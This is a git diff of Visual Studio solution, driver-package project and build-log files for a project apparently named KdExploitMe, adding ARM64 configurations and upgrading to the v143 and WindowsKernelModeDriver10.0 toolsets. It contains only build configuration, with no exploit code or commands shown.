@@ -0,0 +1,2 @@
+PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.44.35207:TargetPlatformVersion=10.0.26100.0:
+Win8.1 Release|ARM64|C:\Users\ayush\Source\Repos\KdExploitMe\|
diff --git a/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.Build.CppClean.log b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.Build.CppClean.log
new file mode 100644
index 0000000..e69de29
diff --git a/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.exe.recipe b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.exe.recipe
new file mode 100644
index 0000000..4edf92f
--- /dev/null
+++ b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.exe.recipe
@@ -0,0 +1,11 @@
+
+
+
+
+ C:\Users\ayush\Source\Repos\KdExploitMe\ARM64\Win8.1 Release\KdExploitMe Package.exe
+
+
+
+
+
+
\ No newline at end of file
diff --git a/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.log b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.log
new file mode 100644
index 0000000..5f28270
--- /dev/null
+++ b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.log
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.vcxproj.FileListAbsolute.txt b/KdExploitMe Package/ARM64/Win8.1 Release/KdExploitMe Package.vcxproj.FileListAbsolute.txt
new file mode 100644
index 0000000..e69de29
diff --git a/KdExploitMe Package/KdExploitMe Package.vcxproj b/KdExploitMe Package/KdExploitMe Package.vcxproj
index e267ad8..c2ad4b9 100644
--- a/KdExploitMe Package/KdExploitMe Package.vcxproj
+++ b/KdExploitMe Package/KdExploitMe Package.vcxproj
@@ -1,338 +1,381 @@
-
-
-
-
- Win8.1 Debug
- Win32
-
-
- Win8.1 Release
- Win32
-
-
- Win8 Debug
- Win32
-
-
- Win8 Release
- Win32
-
-
- Win7 Debug
- Win32
-
-
- Win7 Release
- Win32
-
-
- Win8.1 Debug
- x64
-
-
- Win8.1 Release
- x64
-
-
- Win8 Debug
- x64
-
-
- Win8 Release
- x64
-
-
- Win7 Debug
- x64
-
-
- Win7 Release
- x64
-
-
-
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}
- {4605da2c-74a5-4865-98e1-152ef136825f}
- v4.5
- 11.0
- Win8.1 Debug
- Win32
- KdExploitMe_Package
-
-
-
- WindowsV6.3
- true
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- WindowsV6.3
- false
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows8
- true
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows8
- false
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows7
- true
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows7
- false
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- WindowsV6.3
- true
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- WindowsV6.3
- false
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows8
- true
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows8
- false
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows7
- true
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
- Windows7
- false
- WindowsKernelModeDriver8.1
- Utility
- Package
- true
-
-
-
-
-
-
-
-
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
- false
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
- false
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
- false
-
-
- DbgengKernelDebugger
- False
- True
-
-
-
- False
- False
- True
-
- 133563
- false
-
-
-
-
-
-
- {a239482b-8b6c-448f-969b-563e3b8de701}
-
-
-
-
-
+
+
+
+
+ Win7 Debug
+ ARM64
+
+
+ Win7 Release
+ ARM64
+
+
+ Win8 Debug
+ ARM64
+
+
+ Win8 Release
+ ARM64
+
+
+ Win8.1 Debug
+ ARM64
+
+
+ Win8.1 Debug
+ Win32
+
+
+ Win8.1 Release
+ ARM64
+
+
+ Win8.1 Release
+ Win32
+
+
+ Win8 Debug
+ Win32
+
+
+ Win8 Release
+ Win32
+
+
+ Win7 Debug
+ Win32
+
+
+ Win7 Release
+ Win32
+
+
+ Win8.1 Debug
+ x64
+
+
+ Win8.1 Release
+ x64
+
+
+ Win8 Debug
+ x64
+
+
+ Win8 Release
+ x64
+
+
+ Win7 Debug
+ x64
+
+
+ Win7 Release
+ x64
+
+
+
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}
+ {4605da2c-74a5-4865-98e1-152ef136825f}
+ v4.5
+ 11.0
+ Win8.1 Debug
+ Win32
+ KdExploitMe_Package
+ 10.0.26100.0
+
+
+
+ WindowsV6.3
+ true
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ WindowsV6.3
+ false
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows8
+ true
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows8
+ false
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows7
+ true
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows7
+ false
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ WindowsV6.3
+ true
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ WindowsV6.3
+ false
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows8
+ true
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows8
+ false
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows7
+ true
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ Windows7
+ false
+ WindowsKernelModeDriver10.0
+ Utility
+ Package
+ true
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+
+
+
+
+
+
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+ false
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+ false
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+ false
+
+
+ DbgengKernelDebugger
+ False
+ True
+
+
+
+ False
+ False
+ True
+
+ 133563
+ false
+
+
+
+
+
+
+ {a239482b-8b6c-448f-969b-563e3b8de701}
+
+
+
+
+
\ No newline at end of file
diff --git a/KdExploitMe Package/KdExploitMe Package.vcxproj.filters b/KdExploitMe Package/KdExploitMe Package.vcxproj.filters
index e1b34f2..73af436 100644
--- a/KdExploitMe Package/KdExploitMe Package.vcxproj.filters
+++ b/KdExploitMe Package/KdExploitMe Package.vcxproj.filters
@@ -1,9 +1,9 @@
-
-
-
-
- {8E41214B-6785-4CFE-B992-037D68949A14}
- inf;inv;inx;mof;mc;
-
-
+
+
+
+
+ {8E41214B-6785-4CFE-B992-037D68949A14}
+ inf;inv;inx;mof;mc;
+
+
\ No newline at end of file
diff --git a/KdExploitMe Package/KdExploitMe Package.vcxproj.user b/KdExploitMe Package/KdExploitMe Package.vcxproj.user
new file mode 100644
index 0000000..0f14913
--- /dev/null
+++ b/KdExploitMe Package/KdExploitMe Package.vcxproj.user
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/KdExploitMe Package/Win7Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate b/KdExploitMe Package/Win7Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
index 02e5dd3..63898e6 100644
--- a/KdExploitMe Package/Win7Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
+++ b/KdExploitMe Package/Win7Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
@@ -1,2 +1,2 @@
-#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
-Win7 Debug|Win32|C:\Github\KdExploitMe\|
+#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
+Win7 Debug|Win32|C:\Github\KdExploitMe\|
diff --git a/KdExploitMe Package/Win7Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate b/KdExploitMe Package/Win7Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
index bc243c7..80286fb 100644
--- a/KdExploitMe Package/Win7Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
+++ b/KdExploitMe Package/Win7Release/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
@@ -1,2 +1,2 @@
-#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
-Win7 Release|Win32|C:\Github\KdExploitMe\|
+#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
+Win7 Release|Win32|C:\Github\KdExploitMe\|
diff --git a/KdExploitMe Package/Win8.1Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate b/KdExploitMe Package/Win8.1Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
index cd25adb..01347e1 100644
--- a/KdExploitMe Package/Win8.1Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
+++ b/KdExploitMe Package/Win8.1Debug/KdExploi.1B88051D.tlog/KdExploitMe Package.lastbuildstate
@@ -1,2 +1,2 @@
-#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
-Win8.1 Debug|Win32|C:\Github\KdExploitMe\|
+#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
+Win8.1 Debug|Win32|C:\Github\KdExploitMe\|
diff --git a/KdExploitMe.sln b/KdExploitMe.sln
index f352c9e..03086fa 100644
--- a/KdExploitMe.sln
+++ b/KdExploitMe.sln
@@ -1,94 +1,122 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio 2013
-VisualStudioVersion = 12.0.21005.1
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "KdExploitMe", "KdExploitMe\KdExploitMe.vcxproj", "{A239482B-8B6C-448F-969B-563E3B8DE701}"
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "KdExploitMe Package", "KdExploitMe Package\KdExploitMe Package.vcxproj", "{1B88051D-A188-4B91-8E2F-5507B2D85D9D}"
- ProjectSection(ProjectDependencies) = postProject
- {A239482B-8B6C-448F-969B-563E3B8DE701} = {A239482B-8B6C-448F-969B-563E3B8DE701}
- EndProjectSection
-EndProject
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExploitDemos", "ExploitDemos\ExploitDemos.vcxproj", "{D6194E14-75CE-456F-8771-2C7EF4455384}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Win32 = Debug|Win32
- Debug|x64 = Debug|x64
- Release|Win32 = Release|Win32
- Release|x64 = Release|x64
- Win7 Debug|Win32 = Win7 Debug|Win32
- Win7 Debug|x64 = Win7 Debug|x64
- Win7 Release|Win32 = Win7 Release|Win32
- Win7 Release|x64 = Win7 Release|x64
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|Win32.ActiveCfg = Win8.1 Debug|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|Win32.Build.0 = Win8.1 Debug|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|Win32.Deploy.0 = Win8.1 Debug|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|x64.ActiveCfg = Win8.1 Debug|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|x64.Build.0 = Win8.1 Debug|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|x64.Deploy.0 = Win8.1 Debug|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|Win32.ActiveCfg = Win8.1 Release|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|Win32.Build.0 = Win8.1 Release|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|Win32.Deploy.0 = Win8.1 Release|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|x64.ActiveCfg = Win8.1 Release|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|x64.Build.0 = Win8.1 Release|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|x64.Deploy.0 = Win8.1 Release|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|Win32.ActiveCfg = Win7 Debug|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|Win32.Build.0 = Win7 Debug|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|Win32.Deploy.0 = Win7 Debug|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|x64.ActiveCfg = Win7 Debug|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|x64.Build.0 = Win7 Debug|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|x64.Deploy.0 = Win7 Debug|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|Win32.ActiveCfg = Win7 Release|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|Win32.Build.0 = Win7 Release|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|Win32.Deploy.0 = Win7 Release|Win32
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|x64.ActiveCfg = Win7 Release|x64
- {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|x64.Build.0 = Win7 Release|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|Win32.ActiveCfg = Win8.1 Debug|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|Win32.Build.0 = Win8.1 Debug|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|Win32.Deploy.0 = Win8.1 Debug|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|x64.ActiveCfg = Win8.1 Debug|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|x64.Build.0 = Win8.1 Debug|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|x64.Deploy.0 = Win8.1 Debug|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|Win32.ActiveCfg = Win8.1 Release|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|Win32.Build.0 = Win8.1 Release|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|Win32.Deploy.0 = Win8.1 Release|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|x64.ActiveCfg = Win8.1 Release|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|x64.Build.0 = Win8.1 Release|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|x64.Deploy.0 = Win8.1 Release|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|Win32.ActiveCfg = Win7 Debug|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|Win32.Build.0 = Win7 Debug|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|Win32.Deploy.0 = Win7 Debug|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|x64.ActiveCfg = Win7 Debug|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|x64.Build.0 = Win7 Debug|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|x64.Deploy.0 = Win7 Debug|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|Win32.ActiveCfg = Win7 Release|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|Win32.Build.0 = Win7 Release|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|Win32.Deploy.0 = Win7 Release|Win32
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|x64.ActiveCfg = Win7 Release|x64
- {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|x64.Build.0 = Win7 Release|x64
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|Win32.ActiveCfg = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|Win32.Build.0 = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|Win32.Deploy.0 = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Debug|x64.ActiveCfg = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|Win32.ActiveCfg = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|Win32.Build.0 = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|Win32.Deploy.0 = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Release|x64.ActiveCfg = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|Win32.ActiveCfg = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|Win32.Build.0 = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|Win32.Deploy.0 = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Debug|x64.ActiveCfg = Debug|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|Win32.ActiveCfg = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|Win32.Build.0 = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|Win32.Deploy.0 = Release|Win32
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|x64.ActiveCfg = Release|x64
- {D6194E14-75CE-456F-8771-2C7EF4455384}.Win7 Release|x64.Build.0 = Release|x64
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.14.36811.4 d17.14
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "KdExploitMe", "KdExploitMe\KdExploitMe.vcxproj", "{A239482B-8B6C-448F-969B-563E3B8DE701}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "KdExploitMe Package", "KdExploitMe Package\KdExploitMe Package.vcxproj", "{1B88051D-A188-4B91-8E2F-5507B2D85D9D}"
+ ProjectSection(ProjectDependencies) = postProject
+ {A239482B-8B6C-448F-969B-563E3B8DE701} = {A239482B-8B6C-448F-969B-563E3B8DE701}
+ EndProjectSection
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExploitDemos", "ExploitDemos\ExploitDemos.vcxproj", "{D6194E14-75CE-456F-8771-2C7EF4455384}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|ARM64 = Debug|ARM64
+ Debug|Win32 = Debug|Win32
+ Debug|x64 = Debug|x64
+ Release|ARM64 = Release|ARM64
+ Release|Win32 = Release|Win32
+ Release|x64 = Release|x64
+ Win7 Debug|ARM64 = Win7 Debug|ARM64
+ Win7 Debug|Win32 = Win7 Debug|Win32
+ Win7 Debug|x64 = Win7 Debug|x64
+ Win7 Release|ARM64 = Win7 Release|ARM64
+ Win7 Release|Win32 = Win7 Release|Win32
+ Win7 Release|x64 = Win7 Release|x64
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|ARM64.ActiveCfg = Win8.1 Release|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|ARM64.Build.0 = Win8.1 Release|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|Win32.ActiveCfg = Win8.1 Debug|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|Win32.Build.0 = Win8.1 Debug|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|Win32.Deploy.0 = Win8.1 Debug|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|x64.ActiveCfg = Win8.1 Debug|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|x64.Build.0 = Win8.1 Debug|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Debug|x64.Deploy.0 = Win8.1 Debug|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|ARM64.ActiveCfg = Win7 Release|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|ARM64.Build.0 = Win7 Release|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|Win32.ActiveCfg = Win8.1 Release|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|Win32.Build.0 = Win8.1 Release|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|Win32.Deploy.0 = Win8.1 Release|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|x64.ActiveCfg = Win8.1 Release|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|x64.Build.0 = Win8.1 Release|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Release|x64.Deploy.0 = Win8.1 Release|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|ARM64.ActiveCfg = Win7 Debug|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|ARM64.Build.0 = Win7 Debug|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|Win32.ActiveCfg = Win7 Debug|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|Win32.Build.0 = Win7 Debug|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|Win32.Deploy.0 = Win7 Debug|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|x64.ActiveCfg = Win7 Debug|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|x64.Build.0 = Win7 Debug|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Debug|x64.Deploy.0 = Win7 Debug|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|ARM64.ActiveCfg = Win7 Release|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|ARM64.Build.0 = Win7 Release|ARM64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|Win32.ActiveCfg = Win7 Release|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|Win32.Build.0 = Win7 Release|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|Win32.Deploy.0 = Win7 Release|Win32
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|x64.ActiveCfg = Win7 Release|x64
+ {A239482B-8B6C-448F-969B-563E3B8DE701}.Win7 Release|x64.Build.0 = Win7 Release|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|ARM64.ActiveCfg = Win8.1 Release|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|ARM64.Build.0 = Win8.1 Release|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|Win32.ActiveCfg = Win8.1 Debug|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|Win32.Build.0 = Win8.1 Debug|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|Win32.Deploy.0 = Win8.1 Debug|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|x64.ActiveCfg = Win8.1 Debug|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|x64.Build.0 = Win8.1 Debug|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Debug|x64.Deploy.0 = Win8.1 Debug|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|ARM64.ActiveCfg = Win7 Release|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|ARM64.Build.0 = Win7 Release|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|Win32.ActiveCfg = Win8.1 Release|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|Win32.Build.0 = Win8.1 Release|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|Win32.Deploy.0 = Win8.1 Release|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|x64.ActiveCfg = Win8.1 Release|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|x64.Build.0 = Win8.1 Release|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Release|x64.Deploy.0 = Win8.1 Release|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|ARM64.ActiveCfg = Win7 Debug|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|ARM64.Build.0 = Win7 Debug|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|Win32.ActiveCfg = Win7 Debug|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|Win32.Build.0 = Win7 Debug|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|Win32.Deploy.0 = Win7 Debug|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|x64.ActiveCfg = Win7 Debug|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|x64.Build.0 = Win7 Debug|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Debug|x64.Deploy.0 = Win7 Debug|x64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|ARM64.ActiveCfg = Win7 Release|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|ARM64.Build.0 = Win7 Release|ARM64
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|Win32.ActiveCfg = Win7 Release|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|Win32.Build.0 = Win7 Release|Win32
+ {1B88051D-A188-4B91-8E2F-5507B2D85D9D}.Win7 Release|Win32.Deploy.0 = Win7 Release|Win32
